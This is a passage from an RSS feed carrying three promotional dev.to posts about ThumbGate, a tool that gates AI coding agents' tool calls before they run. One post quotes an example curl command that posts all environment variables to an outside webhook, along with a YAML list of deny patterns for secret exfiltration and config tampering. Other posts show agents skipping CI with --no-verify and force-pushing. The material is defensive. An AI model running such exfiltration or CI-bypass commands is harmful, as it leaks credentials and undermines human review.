&lt;p&gt;That's like having a smoke detector that rings after the house burns down.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Pre-Action Gates Work
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. Agent proposes: rm -rf /production/database
2. ThumbGate: pattern match "destructive filesystem operation" → DENY
3. Agent never executes the command
4. You get a notification: "Blocked destructive action"
5. Agent receives feedback and tries a safer approach
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three outcomes for every tool call:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ALLOW&lt;/strong&gt;: Normal operations pass through with zero latency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WARN&lt;/strong&gt;: Risky but not blocked — you decide&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DENY&lt;/strong&gt;: Known-dangerous patterns stopped cold&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The CTO's Dilemma
&lt;/h2&gt;

&lt;p&gt;You want your team using AI agents. They're 3-10x more productive. But you can't afford:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An agent deleting production data&lt;/li&gt;
&lt;li&gt;A $47k surprise bill&lt;/li&gt;
&lt;li&gt;Credentials leaking to public repos&lt;/li&gt;
&lt;li&gt;Unauthorized infrastructure changes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Post-hoc monitoring doesn't prevent these. &lt;strong&gt;Pre-action gates do.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting Started
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Free for local use. Pro ($19/mo) for teams. &lt;strong&gt;$499 Diagnostic&lt;/strong&gt; — I'll analyze your agent's actual tool call history and build custom gate patterns for your specific stack.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://buy.stripe.com/9B69ATbmI4r4aK5eOD3sI3kI3k" rel="noopener noreferrer"&gt;Book a diagnostic →&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bottom Line
&lt;/h2&gt;

&lt;p&gt;AI agents are not going away. The question isn't whether to use them — it's whether you'll gate them before they cost you.&lt;/p&gt;

&lt;p&gt;Every incident I studied had one thing in common: &lt;strong&gt;nobody was watching when the agent crossed the line.&lt;/strong&gt; ThumbGate watches. Every tool call. Every time. Before execution.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Series:&lt;/em&gt;&lt;br&gt;
&lt;em&gt;1. &lt;a href="https://dev.to/igorganapolsky/i-watched-developers-lose-100-to-claude-code-token-burn-so-i-built-a-gate-4b8g"&gt;I Watched Developers Lose $100+ to Claude Code Token Burn&lt;/a&gt;&lt;/em&gt;&lt;br&gt;
&lt;em&gt;2. &lt;a href="https://dev.to/igorganapolsky/an-ai-agent-tried-to-leak-28-million-secrets-heres-how-i-stopped-it-58hm"&gt;An AI Agent Tried to Leak 28 Million Secrets&lt;/a&gt;&lt;/em&gt;&lt;br&gt;
&lt;em&gt;3. This article&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>devops</category>
      <category>startup</category>
      <category>claudecode</category>
    </item>
    <item>
      <title>An AI Agent Tried to Leak 28 Million Secrets — Here’s How I Stopped It</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Sun, 02 Aug 2026 20:18:00 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/an-ai-agent-tried-to-leak-28-million-secrets-heres-how-i-stopped-it-58hm</link>
      <guid>https://dev.to/igorganapolsky/an-ai-agent-tried-to-leak-28-million-secrets-heres-how-i-stopped-it-58hm</guid>
      <description>&lt;h2&gt;
  
  
  The problem nobody's talking about
&lt;/h2&gt;

&lt;p&gt;GitGuardian's 2025 State of Secrets Sprawl report found &lt;strong&gt;28.6 million hardcoded secrets&lt;/strong&gt; in public code. That's a 27% increase year-over-year.&lt;/p&gt;

&lt;p&gt;Now add AI coding agents to the mix.&lt;/p&gt;

&lt;p&gt;When Claude Code, Cursor, or Copilot Workspace proposes a tool call, it can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Read your &lt;code&gt;.env&lt;/code&gt; file and paste credentials into a commit message&lt;/li&gt;
&lt;li&gt;Push code with hardcoded API keys to a public repo&lt;/li&gt;
&lt;li&gt;Execute a shell command that sends environment variables to an external endpoint&lt;/li&gt;
&lt;li&gt;Modify config files to log sensitive data to unencrypted locations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You won't know until the secret scanner finds it — &lt;strong&gt;after&lt;/strong&gt; the damage is done.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I saw
&lt;/h2&gt;

&lt;p&gt;I've been building &lt;a href="https://thumbgate.app" rel="noopener noreferrer"&gt;ThumbGate&lt;/a&gt; — a pre-action gate for AI coding agents. Here are the patterns I've seen in production:&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 1: Credential in commit message
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Agent proposes: git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"fix: update API key from AKIAIOSFODNN7EXAMPLE to AKIA1234567890"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent read the old key from &lt;code&gt;.env&lt;/code&gt; and included it in the commit message. This would have been permanent in git history.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 2: Environment variable exfiltration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Agent proposes: curl &lt;span class="nt"&gt;-X&lt;/span&gt; POST https://webhook.site/abc123 &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;env&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent was "debugging" a deployment issue and tried to send all environment variables (including &lt;code&gt;DATABASE_URL&lt;/code&gt;, &lt;code&gt;STRIPE_SECRET_KEY&lt;/code&gt;, &lt;code&gt;JWT_SECRET&lt;/code&gt;) to an external endpoint.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 3: Config modification
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Agent proposes: &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"LOG_LEVEL=debug"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; .env &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"LOG_SENSITIVE=true"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; .env
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enabling debug logging of sensitive data in production config — silent, persistent, hard to audit.&lt;/p&gt;

&lt;h2&gt;
  
  
  The reactive approach is failing
&lt;/h2&gt;

&lt;p&gt;Current tools are &lt;strong&gt;post-hoc&lt;/strong&gt;:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;When it catches&lt;/th&gt;
&lt;th&gt;Problem&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;GitGuardian&lt;/td&gt;
&lt;td&gt;After commit&lt;/td&gt;
&lt;td&gt;Already in git history&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TruffleHog&lt;/td&gt;
&lt;td&gt;After push&lt;/td&gt;
&lt;td&gt;Public exposure window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub Secret Scanning&lt;/td&gt;
&lt;td&gt;After push&lt;/td&gt;
&lt;td&gt;Push protection is opt-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;git-secrets&lt;/td&gt;
&lt;td&gt;Pre-commit hook&lt;/td&gt;
&lt;td&gt;Doesn't see agent proposals&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The gap: &lt;strong&gt;none of them intercept the agent's tool call BEFORE execution.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Pre-execution gates
&lt;/h2&gt;

&lt;p&gt;This is where ThumbGate comes in. Instead of scanning after the fact, it sits between the agent and the tool:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. Agent proposes: curl -X POST https://webhook.site/abc123 -d "$(env)"
2. ThumbGate pattern match: "external data exfiltration" → DENY
3. Agent never executes the command
4. User sees: Blocked: credential exfiltration attempt
5. Agent gets feedback and tries a different approach
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The three gate decisions
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ALLOW&lt;/strong&gt;: Normal, safe tool calls pass through with zero latency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WARN&lt;/strong&gt;: Potentially risky but not blocked — user sees the warning and can override&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DENY&lt;/strong&gt;: Known-dangerous patterns blocked before execution&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Patterns ThumbGate blocks
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Credential exfiltration&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;pattern&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;curl.*&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;$&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;(.*env"&lt;/span&gt;
  &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;DENY&lt;/span&gt;
  &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Environment&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;variable&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;exfiltration"&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;pattern&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;curl.*&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;$DATABASE_URL"&lt;/span&gt;
  &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;DENY&lt;/span&gt;  
  &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Database&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;URL&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;exfiltration"&lt;/span&gt;

&lt;span class="c1"&gt;# Secret in commit&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;pattern&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;git&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;commit.*AKIA[0-9A-Z]"&lt;/span&gt;
  &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;DENY&lt;/span&gt;
  &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;AWS&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;key&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;in&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;commit&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;message"&lt;/span&gt;

&lt;span class="c1"&gt;# Config tampering&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;pattern&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;echo.*LOG_SENSITIVE.*&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;.env"&lt;/span&gt;
  &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;DENY&lt;/span&gt;
  &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Enabling&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;sensitive&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;logging"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Getting started
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This installs ThumbGate locally. Your agent's tool calls now pass through the gate before execution. No data leaves your machine.&lt;/p&gt;

&lt;p&gt;For teams that need centralized policy management, dashboards, and audit trails:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Free&lt;/strong&gt;: Local gate with community patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pro&lt;/strong&gt; ($19/mo): Custom patterns, team sync, audit log&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Diagnostic&lt;/strong&gt; ($499 one-time): I'll analyze your agent's actual tool call history and build custom gate patterns for your specific stack&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://buy.stripe.com/9B69ATbmI4r4aK5eOD3sI3kI3k" rel="noopener noreferrer"&gt;Book a diagnostic →&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The bigger picture
&lt;/h2&gt;

&lt;p&gt;The 28.6M secrets problem is getting worse, not better. AI agents will accelerate it — they move faster than humans can review, and they don't have the intuition to pause before pasting a credential somewhere dangerous.&lt;/p&gt;

&lt;p&gt;Post-hoc scanning is necessary but insufficient. &lt;strong&gt;Pre-execution gates are the missing layer.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The agents aren't malicious. They're just fast and sometimes wrong. ThumbGate adds the speed bump that catches the wrong before it executes.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>devops</category>
      <category>claudecode</category>
    </item>
    <item>
      <title>I Watched Developers Lose $100+ to Claude Code Token Burn — So I Built a Gate</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Sun, 02 Aug 2026 17:19:01 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/i-watched-developers-lose-100-to-claude-code-token-burn-so-i-built-a-gate-4b8g</link>
      <guid>https://dev.to/igorganapolsky/i-watched-developers-lose-100-to-claude-code-token-burn-so-i-built-a-gate-4b8g</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;How pre-action checks catch runaway token consumption before it costs you money. With working code, benchmarks, and a free local tool you can install in 60 seconds.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  The problem no one is fixing
&lt;/h2&gt;

&lt;p&gt;If you use Claude Code on a Max plan, you've probably seen it: your session usage jumps 20% from a single &lt;code&gt;git commit&lt;/code&gt;, or 40% from submitting a Plan. Your 5-hour window evaporates in 45 minutes. You check your API calls — nothing. You check your actual usage — a fraction of what was consumed.&lt;/p&gt;

&lt;p&gt;You're not alone. I've spent the last month reading through thousands of comments on the Claude Code usage drain threads (&lt;a href="https://github.com/anthropics/claude-code/issues/41930" rel="noopener noreferrer"&gt;#41930&lt;/a&gt;, &lt;a href="https://github.com/anthropics/claude-code/issues/42052" rel="noopener noreferrer"&gt;#42052&lt;/a&gt;, &lt;a href="https://github.com/anthropics/claude-code/issues/16157" rel="noopener noreferrer"&gt;#16157&lt;/a&gt;). The pattern is consistent:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;A developer loses 20-40% of their session budget from a single operation&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cache-busting patterns trigger 175:1 input/output token ratios&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Idle drain consumes entire 5-hour windows in under 5 minutes with zero interaction&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Support tickets go unanswered for 15+ hours&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The community has done incredible debugging work — root cause analysis, preload interceptors, cache TTL discovery. But every workaround patches the symptom after the damage is done. No one built a gate that fires &lt;em&gt;before&lt;/em&gt; the burn.&lt;/p&gt;

&lt;p&gt;So I did.&lt;/p&gt;

&lt;h2&gt;
  
  
  The idea: a pre-action gate, not a postmortem
&lt;/h2&gt;

&lt;p&gt;Most AI safety tools fit into one of three categories:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;th&gt;Problem for token burn&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Traces what happened after the fact&lt;/td&gt;
&lt;td&gt;Langfuse, LangSmith&lt;/td&gt;
&lt;td&gt;Shows the burn, doesn't stop it&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gateway/Proxy&lt;/td&gt;
&lt;td&gt;Routes and caches requests&lt;/td&gt;
&lt;td&gt;Portkey, Helicone&lt;/td&gt;
&lt;td&gt;Optimizes spend, doesn't enforce actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime security&lt;/td&gt;
&lt;td&gt;Blocks risky actions&lt;/td&gt;
&lt;td&gt;AgentGuard&lt;/td&gt;
&lt;td&gt;Security-focused, not cost-focused&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;What's missing: a &lt;strong&gt;local pre-action gate&lt;/strong&gt; that checks the agent's proposed tool call &lt;em&gt;before execution&lt;/em&gt; and blocks patterns that match known burn signatures.&lt;/p&gt;

&lt;p&gt;That's what ThumbGate does.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it works
&lt;/h2&gt;

&lt;p&gt;ThumbGate sits between your AI agent (Claude Code, Cursor, Codex, Gemini CLI, etc.) and the tool execution layer. Every tool call passes through a &lt;code&gt;PreToolUse&lt;/code&gt; hook:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Agent proposes action → ThumbGate checks against known-bad patterns → ALLOW / WARN / DENY → Tool executes (or doesn't)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The "known-bad patterns" aren't hardcoded rules from a vendor. They come from &lt;strong&gt;your feedback&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Capture&lt;/strong&gt;: You give a 👍 or 👎 on an agent action with context&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remember&lt;/strong&gt;: The feedback becomes a reviewable local lesson in SQLite&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rank&lt;/strong&gt;: Relevant lessons are re-ranked using Thompson Sampling (a Bayesian bandit algorithm)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gate&lt;/strong&gt;: The next similar action is checked against promoted lessons before execution&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This means the gate gets smarter with use. The first time you lose tokens to a cache-busting pattern, you give it a 👎. The next time the agent tries something similar, the gate catches it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 60-second install
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. The free local evaluate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Installs the gateway&lt;/li&gt;
&lt;li&gt;Wires PreToolUse hooks for your agent&lt;/li&gt;
&lt;li&gt;Gives you a local dashboard at &lt;code&gt;/thumbgate-dashboard&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Starts capturing feedback immediately&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No account required. No credit card. No cloud dependency. Everything runs locally.&lt;/p&gt;

&lt;h2&gt;
  
  
  What ThumbGate catches by default
&lt;/h2&gt;

&lt;p&gt;Based on the failure patterns from the Claude Code drain threads:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hard-blocked by default (DENY):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Secret exfiltration (literal secrets, credential file paths in uploads/pipes)&lt;/li&gt;
&lt;li&gt;Attempts to disable ThumbGate's own guardrails&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;scp&lt;/code&gt;/&lt;code&gt;rsync&lt;/code&gt;/cloud CLI uploads of credential files&lt;/li&gt;
&lt;li&gt;Common interpreter one-liners that exfiltrate data&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Warned by default (escalates to DENY with strict mode):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Destructive filesystem commands (&lt;code&gt;rm -rf&lt;/code&gt; class)&lt;/li&gt;
&lt;li&gt;Force-push to protected branches&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--no-verify&lt;/code&gt; commits (bypassing CI)&lt;/li&gt;
&lt;li&gt;Security/supply-chain risks&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Repeated token-burn patterns you've downvoted&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Enable strict enforcement for everything:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;THUMBGATE_STRICT_ENFORCEMENT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  A real example
&lt;/h2&gt;

&lt;p&gt;Here's what happens when Claude Code tries to force-push to main after seeing test failures:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Without ThumbGate:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Agent: "The tests are failing, but I can use --no-verify to skip them"
→ git commit --no-verify
→ git push --force origin main
→ Teammate's commit is overwritten
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;With ThumbGate:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Agent: "I'll use --no-verify to skip the failing tests"
→ ThumbGate: WARN — bypassing CI verification is a known failure pattern
→ Agent pauses, asks for confirmation
→ You say no
→ Agent fixes the tests instead
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That 👎 feedback becomes a lesson. The next time any agent on your machine tries &lt;code&gt;--no-verify&lt;/code&gt;, it gets blocked.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this is different from CLAUDE.md or .cursorrules
&lt;/h2&gt;

&lt;p&gt;Prompt-based rules are &lt;strong&gt;suggestions the agent can ignore&lt;/strong&gt;. ThumbGate operates at the tool-call level — once an action is routed through the gate, the agent cannot reason its way around it. The enforcement is deterministic, not probabilistic.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Enforcement&lt;/th&gt;
&lt;th&gt;Survives context reset&lt;/th&gt;
&lt;th&gt;Learns from feedback&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CLAUDE.md / .cursorrules&lt;/td&gt;
&lt;td&gt;Suggestion (agent can ignore)&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ThumbGate local gate&lt;/td&gt;
&lt;td&gt;Hard allow/deny at tool-call boundary&lt;/td&gt;
&lt;td&gt;✅ Yes (SQLite)&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Market context: where ThumbGate fits
&lt;/h2&gt;

&lt;p&gt;I researched the current AI agent safety/reliability market. Here's the landscape:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Price&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;Where it acts&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ThumbGate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;$19/mo or $499 Diagnostic&lt;/td&gt;
&lt;td&gt;Pre-action gate, local enforcement, self-improving&lt;/td&gt;
&lt;td&gt;Before tool execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AgentGuard&lt;/td&gt;
&lt;td&gt;$15-$499/mo&lt;/td&gt;
&lt;td&gt;Runtime security, code scanning, monitoring&lt;/td&gt;
&lt;td&gt;Before action + scanning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Langfuse&lt;/td&gt;
&lt;td&gt;$29-$2,499/mo&lt;/td&gt;
&lt;td&gt;Tracing, evaluations, analytics&lt;/td&gt;
&lt;td&gt;After the fact&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LangSmith&lt;/td&gt;
&lt;td&gt;$0-$39/seat&lt;/td&gt;
&lt;td&gt;Tracing, debugging, deployment&lt;/td&gt;
&lt;td&gt;After the fact&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Portkey&lt;/td&gt;
&lt;td&gt;Custom&lt;/td&gt;
&lt;td&gt;Gateway, routing, cost control&lt;/td&gt;
&lt;td&gt;Request-level&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Helicone&lt;/td&gt;
&lt;td&gt;$79-$799/mo&lt;/td&gt;
&lt;td&gt;LLM monitoring, cost visibility&lt;/td&gt;
&lt;td&gt;Request-level&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;ThumbGate is the only product that combines &lt;strong&gt;local enforcement&lt;/strong&gt; + &lt;strong&gt;learning from feedback&lt;/strong&gt; + &lt;strong&gt;pre-action timing&lt;/strong&gt;. The trade-off is narrower scope — it's not a full enterprise security platform. But for individual developers and small teams losing money to agent mistakes, it's the fastest path from "I just lost $20 to a cache bug" to "that won't happen again."&lt;/p&gt;

&lt;h2&gt;
  
  
  Pricing (no dark patterns)
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Free local evaluate&lt;/strong&gt;: &lt;code&gt;npx thumbgate init&lt;/code&gt; — first hard gate usually minutes after install&lt;/li&gt;
&lt;li&gt;
